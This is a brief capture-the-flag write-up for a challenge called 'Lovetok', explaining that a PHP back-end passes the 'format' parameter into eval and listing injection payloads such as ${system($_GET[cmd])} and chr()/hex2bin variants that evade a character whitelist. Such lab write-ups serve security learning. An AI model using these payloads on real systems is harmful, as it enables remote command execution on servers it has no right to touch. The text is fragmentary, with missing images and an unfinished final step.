Lovetok

The website:

We can see that the back-end gives time when we give a certian value to the format parameter:

We also have the code:

we can see that the input we give 'r' is directly going into the eval function:

So we need to inject code here somehow -> but how?

we can try different code payloads like:

1. ${system($_GET[cmd])}&cmd=ls

2. ${print(`ls`)}

3. to bypass the whitelist:

   1. ${system(chr(105).chr(100))}

   2. ${system(hex2bin(6964))}

4. to bypass restriction for slashes read

and we get the flag: